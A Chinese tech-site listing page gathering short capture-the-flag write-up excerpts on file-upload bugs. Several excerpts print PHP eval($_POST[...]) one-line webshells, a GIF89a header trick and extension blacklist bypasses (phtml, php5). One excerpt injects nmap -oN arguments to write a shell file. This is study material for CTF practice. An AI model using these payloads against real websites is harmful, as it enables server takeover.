ICode9

精准搜索请尝试: 精确搜索
  • [极客大挑战 2019]Upload2022-01-19 13:36:11

    简单的文件上传漏洞题目 题目要求上传图片那我们就考虑上传一个phtml文件,然后抓包改下上传文件的类型 将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备 GIF89a <script language="php">eval($_POST['hhz']);</script> 上面的头是gif的文件头,用来对应对文件的扫描 我们将它

  • actf2020upload2021-12-28 20:35:59

    actf2020upload .php后缀过滤 1.上传文件,要求后缀为.png/.gif/.jpg 2.抓包,后缀改成.phtml后放行,上传成功,访问地址,根目录下找到flag    

  • magento教程---如何使用 virtual types2021-12-17 23:04:17

    视频地址: https://www.youtube.com/watch?v=DiAS3vE6OO4&list=PL9Q0S-CmtAhJVjwnK5ip6H84sCuRQcACY&index=28 virtual types 实现了依赖注入的无限嵌套。并且不用创建出实际的类,用di.xml创建出虚拟类。    这个对象,是把一个数组转换成一个对象。然后获取数组的value,就可以用$o

  • 文件上传-[极客大挑战 2019]Upload 12021-08-01 16:03:19

    首先打开网址之后是一个文件上传      直接上传一句话木马 <?php @eval($_POST['attack']);?>    然后我们抓包改成Content-Type:image/jpeg   之后又发现其对文件后缀名进行了限制过滤了(绕过的方法php3,php4,php5,phtml,pht) 发现php3,php4,php5被过滤了将文件后缀改成

  • BUUCTF | [极客大挑战 2019]Upload2021-06-20 02:32:50

    步骤

  • buu [ACTF2020 新生赛]Upload2021-05-31 22:00:20

    构造test.php(一句话木马),内容如下 GIF89a<script language="php">eval($_POST['shell']);</script> 抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称 再用中国蚁剑链接,查找目录 可得flag

  • 第十六题——[极客大挑战 2019]Upload2021-04-10 14:29:40

    题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,提示上传图片文件 第二步:从本地上传图片,查看检测方式 从本地上传一张照片,使用burpsuit抓包,看到Content-Type一栏标注了格式为 image/png 第三步:准备一句话木马进行上传 一句话木马种类: php的一句话木马: <?php

  • [网鼎杯 2020 朱雀组]Nmap2020-11-14 16:33:55

    [网鼎杯 2020 朱雀组]Nmap nmap 本题的考点是利用nmap的-oN写shell。 nmap -oN xxx.txt 先构造: ' -oN w4ke.txt ' 返回了Host maybe down,然后访问一下w4ke.txt 构造: ' -oN w4ke.php <?php eval($_POST['w4ke']); ?> ' 返回了Hacker... fuzz了一下,发现了php被过滤,phtml可以用

  • 文件上传漏洞之黑名单验证2020-10-04 12:33:32

    pass-03 只禁止了部分扩展名,还有.php5等扩展名可以解析为PHP。 上传.php5即可。 类似的扩展名有:php2,php3、php4、php5、phtml、等

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有